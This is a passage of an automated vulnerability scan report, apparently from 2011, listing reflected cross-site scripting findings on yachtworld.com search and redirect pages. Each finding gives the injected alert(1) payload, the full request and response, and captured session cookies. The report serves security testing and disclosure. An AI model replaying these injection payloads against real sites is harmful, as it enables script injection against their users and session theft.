savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; boats_session_info=session_uom:126:locale_currency_id:100; s_pers=%20s_nr%3D1296157124506%7C1298749124506%3B%20s_lv%3D1296157124508%7C1390765124508%3B%20s_lv_s%3DFirst%2520Visit%7C1296158924508%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.27.10.1296155835;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:58:50 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

<titl
...[SNIP]...
ase entered"
s.prop7="no search phrase entered"
s.prop8="no search phrase entered"
s.prop9="no search phrase entered"
s.prop10="no search phrase entered"
s.prop11="no search phrase entered"
s.prop12="0c3e9f";alert(1)//caf0417ccb5"
s.prop13="no search phrase entered"
s.prop14="no search phrase entered"
s.prop15="no search phrase entered"
s.prop16="no search phrase entered"
s.prop17="no search phrase entered"
s.prop18="no search
...[SNIP]...

3.533. https://www.yachtworld.com/core/listing/cache/searchResults.jsp [hmid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.yachtworld.com
Path:	/core/listing/cache/searchResults.jsp

Issue detail

The value of the hmid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6f074"%3balert(1)//a4387237870 was submitted in the hmid parameter. This input was echoed as 6f074";alert(1)//a4387237870 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /core/listing/cache/searchResults.jsp?cit=true&slim=quick&sm=3&hmid=06f074"%3balert(1)//a4387237870&ftid=0&enid=0&currencyid=100&luom=126&N=2280&searchtype=topmenu HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=4B0B0F72E37A07E93F136CA779786D04.boapp05; __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A30PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20s_sq%3D%3B; boats_temp_info=lf:ywlf; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=4318294598094503882; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; boats_session_info=session_uom:126:locale_currency_id:100; s_pers=%20s_nr%3D1296157124506%7C1298749124506%3B%20s_lv%3D1296157124508%7C1390765124508%3B%20s_lv_s%3DFirst%2520Visit%7C1296158924508%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.27.10.1296155835;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:58:48 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

<titl
...[SNIP]...
rase entered"
s.prop6="no search phrase entered"
s.prop7="no search phrase entered"
s.prop8="no search phrase entered"
s.prop9="no search phrase entered"
s.prop10="no search phrase entered"
s.prop11="06f074";alert(1)//a4387237870"
s.prop12="no search phrase entered"
s.prop13="no search phrase entered"
s.prop14="no search phrase entered"
s.prop15="no search phrase entered"
s.prop16="no search phrase entered"
s.prop17="no search
...[SNIP]...

3.534. https://www.yachtworld.com/core/listing/cache/searchResults.jsp [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.yachtworld.com
Path:	/core/listing/cache/searchResults.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cb3d7"style%3d"x%3aexpression(alert(1))"22a87b9b6f4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as cb3d7"style="x:expression(alert(1))"22a87b9b6f4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /core/listing/cache/searchResults.jsp?cb3d7"style%3d"x%3aexpression(alert(1))"22a87b9b6f4=1 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=4B0B0F72E37A07E93F136CA779786D04.boapp05; __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A30PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20s_sq%3D%3B; boats_temp_info=lf:ywlf; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=4318294598094503882; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; boats_session_info=session_uom:126:locale_currency_id:100; s_pers=%20s_nr%3D1296157124506%7C1298749124506%3B%20s_lv%3D1296157124508%7C1390765124508%3B%20s_lv_s%3DFirst%2520Visit%7C1296158924508%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.27.10.1296155835;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:58:44 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

<titl
...[SNIP]...
<a rel="nofollow" href="/core/listing/cache/searchResults.jsp?N=2286&cb3d7"style="x:expression(alert(1))"22a87b9b6f4" >
...[SNIP]...

3.535. https://www.yachtworld.com/core/listing/cache/searchResults.jsp [sm parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.yachtworld.com
Path:	/core/listing/cache/searchResults.jsp

Issue detail

The value of the sm request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e0811'%3balert(1)//840047d5ffc was submitted in the sm parameter. This input was echoed as e0811';alert(1)//840047d5ffc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /core/listing/cache/searchResults.jsp?cit=true&slim=quick&sm=3e0811'%3balert(1)//840047d5ffc&hmid=0&ftid=0&enid=0&currencyid=100&luom=126&N=2280&searchtype=topmenu HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=4B0B0F72E37A07E93F136CA779786D04.boapp05; __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A30PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20s_sq%3D%3B; boats_temp_info=lf:ywlf; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=4318294598094503882; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; boats_session_info=session_uom:126:locale_currency_id:100; s_pers=%20s_nr%3D1296157124506%7C1298749124506%3B%20s_lv%3D1296157124508%7C1390765124508%3B%20s_lv_s%3DFirst%2520Visit%7C1296158924508%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.27.10.1296155835;

Response

HTTP/1.0 500 Internal Server Error
Date: Thu, 27 Jan 2011 20:58:45 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

...[SNIP]...
<br>'+ 'ExceptionMessage: For input string: "3e0811';alert(1)//840047d5ffc"<br>
...[SNIP]...

3.536. https://www.yachtworld.com/leaving_yw.cgi [url parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.yachtworld.com
Path:	/leaving_yw.cgi

Issue detail

The value of the url request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f5910"><script>alert(1)</script>e77c160dbbc was submitted in the url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /leaving_yw.cgi?url=http://www.barkerassociates.netf5910"><script>alert(1)</script>e77c160dbbc HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:48:21 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=ISO-8859-1

<HTML>
<HEAD>
<TITLE></TITLE>
</HEAD>
<FRAMESET ROWS="55,*">
<FRAME SRC="/scripts/return2yw.cgi?referer=" NAME="back" noscroll>
<FRAME SRC="http://www.barkerassociates.netf5910"><script>alert(1)</scri
...[SNIP]...
<A HREF="http://www.barkerassociates.netf5910"><script>alert(1)</script>e77c160dbbc">
...[SNIP]...

3.537. https://www.yachtworld.com/leaving_yw.cgi [url parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.yachtworld.com
Path:	/leaving_yw.cgi

Issue detail

The value of the url request parameter is copied into the value of a tag attribute which can contain JavaScript. The payload javascript%3aalert(1)//b314c5c8 was submitted in the url parameter. This input was echoed as javascript:alert(1)//b314c5c8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /leaving_yw.cgi?url=javascript%3aalert(1)//b314c5c8 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; 